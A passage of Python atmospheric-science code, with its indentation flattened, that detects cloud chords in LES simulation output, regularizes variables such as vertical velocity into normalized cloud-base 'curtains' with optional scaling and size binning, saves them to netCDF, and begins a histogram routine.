# boundary_scaling_flag: 0 nothing, 1 uses the surface fluxes and cloud base height to calculate either w/w*, thl'/thl*, or qt'/qt*
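# Example call (hypothetical paths), regularizing w anomalies from 3D snapshots:
#   proc_beard_regularize(reg_var='w', date_str='20160611', data_dim_flag=3, anomaly_flag=1, N_it_max=10)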
time_begin = ttiimmee.time()
dz = 25.0 #39.0625 #Is recalculated from the profile file later on
dx = 25.0
date = date_str
#1D clustering parameters in seconds, taken to agree with Lareau
if chord_times == 0:
t_gap = 20
t_min = 30
t_max = 120000
cell_min = 3 #Minimal number of cells needed per chord
curtain_min = 10 #Minimal number of cells needed to convert into a curtain
# #1D clustering parameters,
#set super strict
if chord_times == 1:
t_gap = 0.#No gaps allowed!
t_min = 0
t_max = 1e9
cell_min = 10 #Minimal number of cells needed per chord
curtain_min = 10 #Minimal number of cells needed per curtain
#value used to determine existence of cloud
ql_min = 1e-5
z_min = 10 #Index of the minimum z level of the CBL
#z_min = 0 #Index of the minimum z level of the CBL
#Flag clean up
if data_dim_flag==1:
scale_flag=0
#Creating dictionary to save all properties
settings_dict = {
'reg_var': reg_var,
'date_str':date_str,
'directory_input':directory_input,
'data_dim_flag':data_dim_flag,
'base_smoothing_flag':base_smoothing_flag,
'plot_curtains_flag' :plot_curtains_flag,
'base_percentile':base_percentile,
'special_name':special_name,
'scale_flag':scale_flag,
'chord_times':chord_times,
'anomaly_flag':anomaly_flag,
'N_it_max':N_it_max,
'N_it_min':N_it_min,
'size_bin_flag':size_bin_flag,
'bin_size':bin_size,
'N_bins':N_bins,
'curtain_extra':curtain_extra
}
#moved to an inner function to avoid issues with global and local variables
def func_curtain_reg(input_2d_field):
#function regularizes to cloud base
#2019-03-20: added smoother to hopefully avoid the impact of harsh jumps
#2019-03-28: Added simplified version for base_smoothing_flag == 2 which gets rid of 1D pre interpolation
#I originally used interp2d, tried griddata but it was a lot slower
#Calculating the regularized t axis but for original resolution
#It is expected to go a bit beyond -1.5 and 1.5, total width defined by curtain_extra
#takes the original time vector, subtracts the mean time from it, then scales it by 1/(time_end_chord-time_beg_chord)
t_reg_orig = t_1d[idx_beg_curtain:idx_end_curtain]-(time_beg_chord+time_end_chord)/2.
t_reg_orig = t_reg_orig/(time_end_chord-time_beg_chord)
#Now we calculate the new regularized grid with the correct vertical but low/original horizontal/time resolution
#mesh_t_low_z_high_x,mesh_t_low_z_high_z = np.meshgrid(t_reg_orig,z_reg_mid) #seems not to be needed
var_t_low_z_high = np.zeros([curtain_cells,n_z_reg])
#introducing z_idx_base vector
#Assigning reference cloud base where no cloud present
z_idx_base=cl_base*1.0+0.0
z_idx_base[:] = z_idx_base_default
for i in range(idx_beg_chord,idx_end_chord):
if i>idx_beg_chord-1 and i<idx_end_chord and cl_base[i]<cbl_1d[i]:
z_idx_base[i] = cl_base[i]
#Here the smoother comes into play:
#We started with a simple 5 cell running mean,
#But now we are making it a function of the chordlength, using a 0.1 running mean
if base_smoothing_flag ==1:
z_idx_base_smooth = z_idx_base*1.0
N = int(np.floor(idx_end_chord-idx_beg_chord)*0.1)
for i in range(idx_beg_chord-N,idx_end_chord+N):
z_idx_base_smooth[i] = sum(z_idx_base[i-N:i+N])/(2*N)
z_idx_base[:] = z_idx_base_smooth[:]
if base_smoothing_flag==2:
#just put the percentile back
z_idx_base[:] = z_idx_base_default
#default version for variable base height
if base_smoothing_flag<2:
#Now for each of the columns of the original curtain a vertical interpolation is done
for i in range(idx_beg_curtain,idx_end_curtain):
#assigining column value
var_orig_col = input_2d_field[:,i]
#Regularizing the z axes so that cloud base is at 1
d_z_tmp = 1.0/z_idx_base[i]
nz = var_orig_col.shape[0]
z_reg_orig_top = d_z_tmp*nz- d_z_tmp/2
z_reg_orig = np.linspace(0+d_z_tmp/2,z_reg_orig_top,nz)
#Have to add 0 to the z_reg_orig to enable interpolation
z_reg_orig = np.hstack([[0],z_reg_orig])
var_orig_col = np.hstack([var_orig_col[0],var_orig_col])
#1D vertical interpolation to get the right columns and assign them one by one to var_t_low_z_high
#f = interp1d(z_reg_orig, var_orig_col, kind='next')
f = interp1d(z_reg_orig, var_orig_col, kind='nearest')
try:
var_reg_inter = f(z_reg_mid)
except:
print(z_idx_base[i])
print(z_reg_orig)
print(z_reg_mid)
var_t_low_z_high[i-idx_beg_curtain,:] = var_reg_inter
#Now that we have var_t_low_z_high we have to interpolate in 2D onto the full regularized grid
#print(t_reg_orig.shape,z_reg_mid.shape)
f = interp2d(t_reg_orig, z_reg_mid, var_t_low_z_high.transpose(), kind='linear')
var_curtain = f(t_reg_mid,z_reg_mid)
#constant base height version
if base_smoothing_flag==2:
#Regularizing the z axes so that cloud base is at 1, since z_idx_base is the same everywhere I just use idx_beg_curtain as one.
i=idx_beg_curtain
d_z_tmp = 1.0/z_idx_base[i]
var_orig_2d = input_2d_field[:,idx_beg_curtain:idx_end_curtain]
nz = var_orig_2d.shape[0]
z_reg_orig_top = d_z_tmp*nz- d_z_tmp/2
z_reg_orig = np.linspace(0+d_z_tmp/2,z_reg_orig_top,nz)
#Have to add 0 to the z_reg_orig to enable interpolation
z_reg_orig = np.hstack([[0],z_reg_orig])
var_orig_2d = np.vstack([var_orig_2d[0,:],var_orig_2d])
f = interp2d(t_reg_orig, z_reg_orig,var_orig_2d, kind='linear')
var_curtain = f(t_reg_mid,z_reg_mid)
return var_curtain
#Creating regularized grid.
d_reg = 0.005
n_z_reg = int(1.5/d_reg)
n_t_reg = int((1+2*curtain_extra)/d_reg)
t_reg_bound = np.linspace(-0.5-curtain_extra,0.5+curtain_extra ,n_t_reg+1)
t_reg_mid = np.linspace(-0.5-curtain_extra+d_reg/2,0.5+curtain_extra-d_reg/2 ,n_t_reg)
z_reg_bound = np.linspace(0,1.5 ,n_z_reg+1)
z_reg_mid = np.linspace(0+d_reg/2,1.5-d_reg/2 ,n_z_reg)
mesh_curtain_t,mesh_curtain_z = np.meshgrid(t_reg_mid,z_reg_mid)
var_curtain = np.zeros([n_t_reg,n_z_reg])
var_curtain_sum = np.zeros([n_t_reg,n_z_reg])
var_curtain_up_sum = np.zeros([n_t_reg,n_z_reg])
var_curtain_dw_sum = np.zeros([n_t_reg,n_z_reg])
n_curtain = 0
n_curtain_up = 0
n_curtain_dw = 0
if size_bin_flag==1:
N_bins = 12
n_curtain_bin = np.zeros([N_bins])
n_curtain_bin_up = np.zeros([N_bins])
n_curtain_bin_dw = np.zeros([N_bins])
var_curtain_bin_sum = np.zeros([N_bins,n_t_reg,n_z_reg])
var_curtain_bin_up_sum = np.zeros([N_bins,n_t_reg,n_z_reg])
var_curtain_bin_dw_sum = np.zeros([N_bins,n_t_reg,n_z_reg])
mid_bin_size = np.linspace(125,-125+N_bins*250,N_bins)
print('mid_bin_size',mid_bin_size)
print('looking into date: ',date)
if data_dim_flag==1:
filename_column = []
#uses glob to get all files which contain column.
column_files = glob.glob(directory_input+date+'/*column*.nc')
for c_file in column_files:
filename_column.append(c_file)
print('filename column included:',c_file)
if data_dim_flag==3:
filename_w = directory_input+date+'/w.nc'
filename_l = directory_input+date+'/ql.nc'
file_w = Dataset(filename_w,read='r')
file_ql = Dataset(filename_l,read='r')
[nz, nx, ny] = get_zxy_dimension(filename_l,'ql')
#getting variable to be regularized
filename_var = directory_input+date+'/'+reg_var+'.nc'
file_var = Dataset(filename_var,read='r')
filename_prof=glob.glob(directory_input+date+'/*default?0*.nc')[0]
#if date=='bomex':
# filename_prof=directory_input+date+'/bomex.default.0000000.nc'
file_prof = Dataset(filename_prof,read='r')
extra_string = ''
n_chords = 0
#This is now a bit trickier than for the 3D version. We have to calculate a vector at the lower time resolution of the profile,
#then later apply the nearest value to the full 1d time vec
#First loading surface variables from default profile
print('calculating cbl height from profile file')
T = file_prof['thl'][:,0]
p = file_prof['p'][:,0]*0.0+99709
qt = file_prof['qt'][:,0]
w2 = file_prof['w2'][:,:]
nz_prof = w2.shape[1]
var_prof = file_prof[reg_var][:,:] #needed for anomaly processing
#Just grabbing this to calculate dz
z_prof = file_prof['z'][:]
dz = z_prof[1]-z_prof[0]
print('dz: ',dz)
#for boundary scaling
total_surf_buoy_flux = file_prof['bflux'][:,1]
total_surf_thl_flux = file_prof['thlflux'][:,1]
total_surf_qt_flux = file_prof['qtflux'][:,1]
time_prof = file_prof['time'][:]
cbl_1d_prof = time_prof*0.0
#Hack together the Lifting condensation level LCL
qt_pressure = p*qt
sat_qv = 6.112*100 * np.exp(17.67 * (T - 273.15) / (T - 29.65 ))
#rel_hum = np.asmatrix(qt_pressure/sat_qv)[0]
rel_hum = qt_pressure/sat_qv
#Dewpoint
A = 17.27
B = 237.7
alpha = ((A * (T- 273.15)) / (B + (T-273.15)))
alpha = alpha + np.log(rel_hum)
dewpoint = (B * alpha) / (A - alpha)
dewpoint = dewpoint + 273.15
LCL = 125.*(T-dewpoint)
LCL_index = np.floor(LCL/dz)
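#Note on the approximation chain above: sat_qv is the Magnus form of the saturation
#vapour pressure, the dewpoint is recovered from the relative humidity via the inverted
#Magnus formula, and the LCL uses the ~125 m per K dewpoint-depression rule of thumb.
#Illustrative check: T = 300 K with a 290 K dewpoint gives LCL = 125*(300-290) = 1250 m,
#i.e. LCL_index = 50 for dz = 25 m.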
#now calculate the cbl top for each profile time
for tt in range(len(time_prof)):
w_var = 1.0
z=z_min
while w_var > 0.08:
z += 1
w_var = w2[tt,z]
#w_var = np.var(w_1d[z,:])
#Minimum of the LCL and the w-variance based height plus 300 m
cbl_1d_prof[tt] = min(z+300/dz,LCL_index[tt])
#To avoid issues later on I set the maximum cbl height to 60 % of the domain height, but spit out a warning if it happens
if cbl_1d_prof[tt]>0.6*nz_prof:
print('warning, cbl height higher than 0.6 domain height, could crash regularization later on, timestep: ',tt)
cbl_1d_prof[tt] = math.floor(nz_prof*0.6)
print('resulting indexes of cbl over time: ',cbl_1d_prof)
print('calculated LCL: ',LCL_index)
#Now we either iterate over columns or timesteps
if data_dim_flag==1:
n_iter =len(filename_column)
if data_dim_flag==3:
n_iter =len(time_prof)
#Setting curtains for var
var_curtain_sum = np.zeros([n_t_reg,n_z_reg])
var_curtain_up_sum = np.zeros([n_t_reg,n_z_reg])
var_curtain_dw_sum = np.zeros([n_t_reg,n_z_reg])
n_curtain = 0
n_chord = 0
n_curtain_up = 0
n_curtain_dw = 0
#for col in filename_column:
n_iter = min(n_iter,N_it_max)
for it in range(N_it_min,n_iter):
print('n_chords: ',n_chords)
print('n_curtain: ',n_curtain)
time1 = ttiimmee.time()
if data_dim_flag ==1:
print('loading column: ',filename_column[it])
file_col = Dataset(filename_column[it], mode='r')
w_2d = file_col.variables['w'][:]
w_2d = w_2d.transpose()
ql_2d = file_col.variables['ql'][:]
ql_2d = ql_2d.transpose()
t_1d = file_col.variables['time'][:]
u_2d = file_col.variables['u'][:]
u_2d = u_2d.transpose()
v_2d = file_col.variables['v'][:]
v_2d = v_2d.transpose()
print('t_1d',t_1d)
#Load the var file, even if it means that we double-load w_2d or ql_2d
var_2d = file_col.variables[reg_var][:]
var_2d = var_2d.transpose()
#The needed cbl height
cbl_1d = t_1d*0
bflux_s_1d = t_1d*0
qtflux_s_1d = t_1d*0
thlflux_s_1d= t_1d*0
#Now we go through profile time snapshots and allocate the closest full time values to the profile values
dt_2 = (time_prof[1]-time_prof[0])/2
for tt in range(len(time_prof)):
cbl_1d[abs(t_1d-time_prof[tt])<dt_2] = cbl_1d_prof[tt]
bflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_buoy_flux[tt]
qtflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_qt_flux[tt]
thlflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_thl_flux[tt]
#to get anomalies we subtract the closest mean profile
if anomaly_flag==1:
for tt in range(len(time_prof)):
tmp_matrix = var_2d[:,abs(t_1d-time_prof[tt])<dt_2]
tmp_vector = var_prof[tt,:]
#because the vectors don't perfectly align
var_2d[:,abs(t_1d-time_prof[tt])<dt_2] = (tmp_matrix.transpose() - tmp_vector).transpose()
# = var_2d[:,abs(t_1d-time_prof[tt])<dt_2]-var_prof[tt,:]
if data_dim_flag ==3:
if sum(file_prof['ql'][it,:])>0.0:
print('loading timestep: ',it)
ql_3d = grab_3d_field(file_ql ,it,'ql')
w_3d = grab_3d_field(file_w ,it,'w')
var_3d = grab_3d_field(file_var ,it,reg_var)
#Here we have to reshape the 3D fields into 2d slices with an imaginary time vector
w_2d = np.array(w_3d.reshape((nz,nx*ny)))
ql_2d = np.array(ql_3d.reshape((nz,nx*ny)))
var_2d = np.array(var_3d.reshape((nz,nx*ny)))
#Now we do the same thing with the transposed field; this used to be an either/or, now it is just added on
w_3d = np.transpose( w_3d, (0, 2, 1))
ql_3d = np.transpose(ql_3d, (0, 2, 1))
var_3d = np.transpose(var_3d, (0, 2, 1))
#globals().update(locals())
w_2d = np.hstack([w_2d ,np.array(w_3d.reshape((nz,nx*ny)))])
ql_2d = np.hstack([ql_2d ,np.array(ql_3d.reshape((nz,nx*ny)))])
var_2d = np.hstack([var_2d ,np.array(var_3d.reshape((nz,nx*ny)))])
#Should now be able to delete 3d fields as they aren't needed anymore, not sure if that helps save any memory though
del w_3d
del ql_3d
del var_3d
gc.collect()
#Switching to anomalies if anomaly flag is used
if anomaly_flag==1:
#because the vectors don't perfectly align
var_2d[:,:] = (var_2d.transpose() - var_prof[it,:]).transpose()
#to get the fake time vector we load the wind from the profile data, which divided by the grid spacing gives us a fake time resolution
#we use the calculated cbl+300 meter or lcl as reference height
ref_lvl = cbl_1d_prof[it]
u_ref = file_prof['u'][it,ref_lvl]
v_ref = file_prof['v'][it,ref_lvl]
V_ref = np.sqrt(u_ref**2+v_ref**2)
time_resolution = dx/V_ref
print('time iterative, V_ref, time_resolution',it, V_ref, time_resolution )
print('ref_lvl used to determine reference winds',ref_lvl )
#fake t vector,
t_1d = np.linspace(0,2*nx*ny*time_resolution,2*nx*ny)#+nx*ny*time_resolution*it
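#Worked example of the space-to-time conversion above (illustrative numbers only):
#with dx = 25 m and V_ref = 5 m/s each column advects past the virtual sensor in
#time_resolution = 25/5 = 5 s, so a 64x64 domain yields 2*64*64 pseudo-timesteps
#spanning a fake flight leg of 2*64*64*5 s = 40960 s.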
else:
#If no clouds are present we pass very short empty fields over to the chord searcher
print('skipping timestep: ',it,' cause no clouds')
ql_2d = np.zeros((nz,1))
w_2d = np.zeros((nz,1))
var_2d = np.zeros((nz,1))
t_1d = np.zeros(1)
#The needed cbl height, which is constant everywhere
cbl_1d = t_1d*0
cbl_1d[:] = cbl_1d_prof[it]
#The needed surface buoyancy flux, which is constant everywhere
bflux_s_1d = t_1d*0 + total_surf_buoy_flux[it]
qtflux_s_1d = t_1d*0 + total_surf_qt_flux[it]
thlflux_s_1d = t_1d*0 + total_surf_thl_flux[it]
time2 = ttiimmee.time()
print('loading time:',(time2-time1)*1.0,)
### Detecting whether the lowest cloud cell is within 300 m of the CBL
nt = len(cbl_1d)
cl_base = np.zeros(nt)
#Detecting all cloudy cells
#Used to have a different method using NaNs that doesn't work anymore somehow. Now I just set it really high where there is no cloud.
for t in range(nt):
if np.max(ql_2d[:,t])>ql_min :
cl_base[t]=np.argmax(ql_2d[:,t]>ql_min)
else:
cl_base[t]=10000000
cl_base=cl_base.astype(int)
#Now find cloud bases lower than the max height
cbl_cl_idx = np.where((cl_base-cbl_1d[:nt])*dz<0)[0]
cbl_cl_binary = cl_base*0
cbl_cl_binary[cbl_cl_idx]=1
t_cbl_cl=t_1d[cbl_cl_idx]
#Scaling between x and y is calculated here if required. Skipped if there are only a few timesteps, which is what is assigned when no clouds are present
if scale_flag > 0 and t_1d.shape[0]>3:
#calculate the profiles of u and v and their scaling
u_ref_prof = file_prof['u'][it,:]
v_ref_prof = file_prof['v'][it,:]
V_ref_prof = np.sqrt(u_ref_prof**2+v_ref_prof**2)
scaling_factor_x_prof = u_ref_prof/V_ref_prof
scaling_factor_y_prof = v_ref_prof/V_ref_prof
#Using the mean cloud base height as the reference lvl
ref_idx = np.mean(cl_base[cbl_cl_idx])
if scale_flag == 1:
#the scaling factors are simply taken at the reference level
scaling_factor_x = scaling_factor_x_prof[int(ref_idx)]
scaling_factor_y = scaling_factor_y_prof[int(ref_idx)]
print('Scaling flag 1: scaling factor_x: ',scaling_factor_x,' scaling factor_y: ',scaling_factor_y, ' int(ref_idx): ',int(ref_idx))
if scale_flag == 2:
#Regularizing the scaling profiles and interpolating them onto the regularized z axis
d_z_tmp = 1.0/ref_idx
nz = scaling_factor_x_prof.shape[0]
z_reg_orig_top = d_z_tmp*nz-d_z_tmp/2
z_reg_orig = np.linspace(0+d_z_tmp/2,z_reg_orig_top,nz)
#Have to add 0 to the z_reg_orig to enable interpolation
z_reg_orig = np.hstack([[0],z_reg_orig])
scaling_factor_x_prof_ext = np.hstack([scaling_factor_x_prof[0],scaling_factor_x_prof])
scaling_factor_y_prof_ext = np.hstack([scaling_factor_y_prof[0],scaling_factor_y_prof])
#1D vertical interpolation of the scaling profiles, assigned one by one onto the regularized grid
f_x = interp1d(z_reg_orig, scaling_factor_x_prof_ext, kind='nearest')
f_y = interp1d(z_reg_orig, scaling_factor_y_prof_ext, kind='nearest')
scaling_factor_x_inter = f_x(z_reg_mid)
scaling_factor_y_inter = f_y(z_reg_mid)
print('Scaling flag 2:, mean scaling_factor_x_inter: ',np.mean(scaling_factor_x_inter),
' mean scaling_factor_y_inter: ',np.mean(scaling_factor_y_inter))
### Clustering 1D
#Now we simply go through all cloudy timesteps
#As long as the difference to the next cloudy timestep is lower than t_gap it counts as the same cloud
#As an additional constraint, if the cloudy cells are right next to each other they are always counted as consecutive, no matter the time distance between them.
#If the difference is larger than t_gap the cloud is over, and a chord is created as the list of all timesteps that belong to it
#However, if the duration of the chord is lower than t_min or higher than t_max seconds it isn't kept
#I added an additional constraint that each chord must include at least cell_min cells, because it is possible to get
#small chords longer than t_min which are mostly gaps.
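#Worked example of the clustering rules (illustrative thresholds: t_gap=20 s, t_min=30 s,
#cell_min=3): cloudy columns at t = [0, 10, 15, 25, 60, 70, 75, 80, 95] s split at the
#35 s gap into [0..25] and [60..95]; the first candidate (25 s) fails t_min, while the
#second (35 s, 5 cells) passes t_min and cell_min and becomes a chord.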
t_cloudy_idx = 0
#n_chords = 0
chord_idx_list = []
print('iterating through step ',it,'which contains ',len(cbl_cl_idx),'cloudy columns')
while t_cloudy_idx < len(cbl_cl_idx)-1 and n_chords<chord_max:
#print('t_chord_begin',t_chord_begin)
t_chord_begin = t_cloudy_idx
#now connecting all cloudy indexes
while t_cloudy_idx < len(cbl_cl_idx)-1 and (cbl_cl_idx[t_cloudy_idx+1]==cbl_cl_idx[t_cloudy_idx]+1 or t_cbl_cl[t_cloudy_idx+1]-t_cbl_cl[t_cloudy_idx]<t_gap):
t_cloudy_idx += 1
t_chord_end = t_cloudy_idx
#print('t_chord_end',t_chord_end)
#Checking if it fulfils the chord criteria regarding time
#we also require a minimum cloud base height (4 cells, i.e. ~100 m for 25 m grid spacing) to screen out fog/dew stuff at the surface
if t_chord_end-t_chord_begin>cell_min:
chord_z_min = np.min(cl_base[cbl_cl_idx[t_chord_begin:t_chord_end]])
chord_duration = t_cbl_cl[t_chord_end]-t_cbl_cl[t_chord_begin]
else:
chord_z_min = 0
chord_duration = 0
if chord_duration>t_min and chord_duration<t_max and chord_z_min > 4:
if t_chord_end-t_chord_begin>cell_min-1:
n_chords += 1
#chord_idx_list.append(list(cbl_cl_idx[t_chord_begin:t_cloudy_idx]))
#Here we start the interpolation stuff
#Getting the chord beginning and end
idx_beg_chord = cbl_cl_idx[t_chord_begin]
idx_end_chord = cbl_cl_idx[t_chord_end]
time_beg_chord = t_1d[idx_beg_chord]
time_end_chord = t_1d[idx_end_chord]
#Calculate the beginning and end of the curtain, we add a bit to each side to make interpolation easy
idx_beg_curtain = (np.abs(t_1d - (time_beg_chord-curtain_extra*(time_end_chord-time_beg_chord)))).argmin()-1
idx_end_curtain = (np.abs(t_1d - (time_end_chord+curtain_extra*(time_end_chord-time_beg_chord)))).argmin()+2
idx_end_curtain = min(idx_end_curtain,nt-1)
time_beg_curtain = t_1d[idx_beg_curtain]
time_end_curtain = t_1d[idx_end_curtain]
chord_cells = t_chord_end-t_chord_begin
curtain_cells = idx_end_curtain-idx_beg_curtain
#If the curtain has more than curtain_min cells and its tail does not extend beyond the end of the 2d field, nor its head before the beginning.
#I added 2 cells buffer at the beginning and end, because for the interpolation a bit of overlap is used.
if idx_end_curtain<nt-2 and idx_beg_curtain>2 and len(cbl_cl_idx[t_chord_begin:t_chord_end])>curtain_min-1:
n_curtain += 1
#First thing to do is calculate the chord base using the 25th percentile in agreement with Neil
z_idx_base_default = math.floor(np.percentile(cl_base[cbl_cl_idx[t_chord_begin:t_cloudy_idx]],base_percentile))
#Regularized curtains, I am too lazy to pass on all my variables to func_curtain_reg so I instead made it a nested function
var_curtain_tmp = (func_curtain_reg(var_2d)).transpose()
if boundary_scaling_flag == 1:
#Now adding the boundary scaling using w*
surf_flux = np.mean(bflux_s_1d[idx_beg_chord:idx_end_chord])
base_height = z_idx_base_default*dz
w_star=(base_height*surf_flux)**(1/3)
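#w_star is the Deardorff convective velocity scale w* = (z_base*B_s)**(1/3), built from
#the chord base height and the mean surface buoyancy flux over the chord. Illustrative
#magnitude: z_base = 1000 m and B_s = 5e-4 m2/s3 give w* = 0.5**(1/3) ~ 0.79 m/s.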
if reg_var=='w':
boundary_scaling = w_star
if reg_var=='qt':
surf_flux = np.mean(qtflux_s_1d[idx_beg_chord:idx_end_chord])
boundary_scaling = surf_flux/w_star
if reg_var=='thl':
thl_flux = np.mean(thlflux_s_1d[idx_beg_chord:idx_end_chord])
boundary_scaling = thl_flux/w_star
var_curtain_tmp = var_curtain_tmp/boundary_scaling
#Finally add it to the mean one and track one more curtain
#detecting if chord base has a positive or negative w, then adds to the sum of up or downdraft chords
w_tmp = w_2d[cl_base[cbl_cl_idx[t_chord_begin:t_cloudy_idx]]-1,cbl_cl_idx[t_chord_begin:t_chord_end]]
#print(w_tmp)
#Scaling is now added here,
#the factor of 2 compensates for each curtain only getting either the x or the y scaling, so dividing by n comes out fine
#We assume here that n_x and n_y are roughly the same
#Could be made cleaner later on
if scale_flag>0 and data_dim_flag==3:
if scale_flag==1:
#find out if we need scaling_factor_x or y by seeing if we are in the first or second half
if idx_end_curtain<nt/2:
scaling_factor = 2*scaling_factor_x
else:
scaling_factor = 2*scaling_factor_y
if scaling_factor>0:
var_curtain_tmp = var_curtain_tmp[::-1,:]
var_curtain_tmp = abs(scaling_factor) * var_curtain_tmp
if scale_flag==2:
if idx_end_curtain<nt/2:
scaling_factor_prof = 2*scaling_factor_x_inter
else:
scaling_factor_prof = 2*scaling_factor_y_inter
for n_prof in range(scaling_factor_prof.shape[0]):
if scaling_factor_prof[n_prof]>0:
var_curtain_tmp[:,n_prof] = var_curtain_tmp[::-1,n_prof]
var_curtain_tmp [:,n_prof]= abs(scaling_factor_prof[n_prof])*var_curtain_tmp[:,n_prof]
#Now adding the var_curtain_tmp to the sums
var_curtain_sum = var_curtain_sum+var_curtain_tmp
if np.mean(w_tmp)>0.:
n_curtain_up += 1
var_curtain_up_sum += var_curtain_tmp
elif np.mean(w_tmp)<0.:
n_curtain_dw += 1
var_curtain_dw_sum += var_curtain_tmp
else:
print('warning, mean chord base w is exactly zero: ',np.mean(w_tmp),w_tmp)
#globals().update(locals())
###############################################################################################################################################
################## SIZE BINNING ##############################################################################################################
###############################################################################################################################################
if size_bin_flag:
#getting V_ref if data_dim_flag==1. Is calculated directly from the cloud base speeds
if data_dim_flag==1:
ch_idx_l = list(cbl_cl_idx[t_chord_begin:t_chord_end])
u_ref=np.mean(u_2d[cl_base[ch_idx_l],ch_idx_l])
v_ref=np.mean(v_2d[cl_base[ch_idx_l],ch_idx_l])
V_ref=np.sqrt(u_ref**2+v_ref**2)
ch_duration = t_cbl_cl[t_chord_end]-t_cbl_cl[t_chord_begin]
chord_length = ch_duration*V_ref
#if scale_flag==0:
# scaling_factor=1.
#find index of bin close to mid size bin
bin_idx = np.where(np.abs(chord_length-mid_bin_size)<125)[0]
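#Bin assignment example (illustrative): a 600 m chord is within 125 m of only the
#625 m bin center (|600-375| = 225, |600-625| = 25), so it lands in bin index 2.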
if bin_idx.size>0:
#print('bin_idx,chord_length',bin_idx,chord_length)
n_curtain_bin[bin_idx] += 1
var_curtain_bin_sum[bin_idx,:,:] = var_curtain_bin_sum[bin_idx,:,:] + var_curtain_tmp
if np.mean(w_tmp)>0.:
n_curtain_bin_up[bin_idx] += 1
var_curtain_bin_up_sum[bin_idx,:,:] += var_curtain_tmp
elif np.mean(w_tmp)<0.:
n_curtain_bin_dw[bin_idx] += 1
var_curtain_bin_dw_sum[bin_idx,:,:] += var_curtain_tmp
else:
print('warning, mean chord base w is exactly zero: ',np.mean(w_tmp),w_tmp)
##############################################################################################################################
#PLOTS
##############################################################################################################################
#If the plot flag is set the pre regularization curtains are plotted.
if plot_curtains_flag ==1:
print('plotting not implemented yet')
##############################################################################################################################
#switching to y direction if half of max chords reached
##############################################################################################################################
if n_chords == int(chord_max/2):
t_cloudy_idx = int(len(cbl_cl_idx)/2)
t_cloudy_idx += 1
time3 = ttiimmee.time()
print('curtain processing:',(time3-time2)/60.0,'minutes')
print(':')
print(':')
print(':')
time_end = ttiimmee.time()
print('total run time of proc_beard_regularize in minutes: ',(time_end-time_begin)/60.)
print(':')
print(':')
print(':')
#Replacing saving with xarray
xr_dataset = xr.Dataset(
data_vars = {reg_var :(('regularized height', 'regularized time'), var_curtain_sum.transpose()/n_curtain),
reg_var+'_up':(('regularized height', 'regularized time'), var_curtain_up_sum.transpose()/n_curtain_up),
reg_var+'_dw':(('regularized height', 'regularized time'), var_curtain_dw_sum.transpose()/n_curtain_dw)},
coords={'regularized time':t_reg_mid, 'regularized height':z_reg_mid})
xr_dataset[reg_var].attrs['n']=n_curtain
xr_dataset[reg_var+'_up'].attrs['n']=n_curtain_up
xr_dataset[reg_var+'_dw'].attrs['n']=n_curtain_dw
xr_dataset.attrs = settings_dict
#Making save string
save_string_base = '_beard_'+date+'_d'+str(data_dim_flag)+'_cb'+str(base_smoothing_flag)+'_an'+str(anomaly_flag)+'_ct'+str(chord_times)+'_ce'+str(int(curtain_extra))
if data_dim_flag==3:
save_string_base = save_string_base+'_sf'+str(scale_flag)
if N_it_min>0:
save_string_base = save_string_base+'_Nmin'+str(N_it_min)
if N_it_max<1e9:
save_string_base = save_string_base+'_Nmax'+str(n_iter)
if boundary_scaling_flag==1:
save_string_base = 'star'+save_string_base
save_string_base = save_string_base+'_'+special_name+'_N'+str(n_curtain)
save_string = directory_output+ reg_var+save_string_base +'.nc'
xr_dataset.to_netcdf(save_string)
print('saved beard data to '+save_string)
if size_bin_flag==1:
xr_dataset = xr.Dataset(
data_vars = {reg_var :(('regularized height', 'regularized time','length'), var_curtain_bin_sum.transpose()/n_curtain_bin),
reg_var+'_up':(('regularized height', 'regularized time','length'), var_curtain_bin_up_sum.transpose()/n_curtain_bin_up),
reg_var+'_dw':(('regularized height', 'regularized time','length'), var_curtain_bin_dw_sum.transpose()/n_curtain_bin_dw)},
coords={'regularized time':t_reg_mid, 'regularized height':z_reg_mid, 'length':mid_bin_size})
xr_dataset[reg_var].attrs['n'] =n_curtain_bin
xr_dataset[reg_var+'_up'].attrs['n'] =n_curtain_bin_up
xr_dataset[reg_var+'_dw'].attrs['n'] =n_curtain_bin_dw
xr_dataset.attrs = settings_dict
save_string = directory_output+ reg_var+save_string_base+'_sizebin.nc'
xr_dataset.to_netcdf(save_string)
print('saved size binned beards to '+save_string)
print(':')
print(':')
print(':')
print(':')
print(':')
return
#A simple script which calculates a histogram below the cloud base and saves it
#I will try to keep it at least somewhat general with a flexible variable
def proc_pdf(reg_var = 'w',
date_str='20160611',
directory_input ='/data/testbed/lasso/sims/',
directory_output ='data_pdfs/',
data_dim_flag=3,
special_name='',
N_it_max=1e9,
N_it_min=0,
anomaly_flag =0,
N_bins=400,
base_percentile = 25,
boundary_scaling_flag = 1,
range_var = [-10,10] ):
#We are starting out with histograms of w from -10 to 10; the default N_bins=400 gives a 0.05 spacing
var_hist_sum=np.zeros(N_bins)
date = date_str
#value used to determine existence of cloud
ql_min = 1e-5
z_min = 10 #Index of the minimum z lvl of the cbl
print('looking into date: ',date)
if data_dim_flag==1:
filename_column = []
#uses glob to get all files which contain column.
column_files = glob.glob(directory_input+date+'/*.column.*.*.*.nc')
for c_file in column_files:
filename_column.append(c_file)
print('filename column included:',c_file)
if data_dim_flag==3:
filename_w = directory_input+date+'/w.nc'
filename_l = directory_input+date+'/ql.nc'
file_w = Dataset(filename_w, mode='r')
file_ql = Dataset(filename_l, mode='r')
[nz, nx, ny] = get_zxy_dimension(filename_l,'ql')
#getting variable to be regularized
filename_var = directory_input+date+'/'+reg_var+'.nc'
file_var = Dataset(filename_var, mode='r')
filename_prof=glob.glob(directory_input+date+'/testbed?default?0*.nc')[0]
#filename_prof=directory_input+date+'/testbed.default.0000000.nc'
if date=='bomex':
filename_prof=directory_input+date+'/bomex.default.0000000.nc'
file_prof = Dataset(filename_prof, mode='r')
extra_string = ''
#This is now a bit trickier than for the 3D version. We have to calculate a vector for the lower time resolution of the profile,
#then later apply the nearest value to the full 1d time vector
#First loading surface variables from default profile
print('calculating cbl height from profile file')
T = file_prof['thl'][:,0]
p = file_prof['p'][:,0]*0.0+99709 #pressure replaced by a constant surface value of 99709 Pa
qt = file_prof['qt'][:,0]
w2 = file_prof['w2'][:,:]
nz_prof = w2.shape[1]
var_prof = file_prof[reg_var][:,:] #needed for anomaly processing
#Just grabbing this to calculate dz
z_prof = file_prof['z'][:]
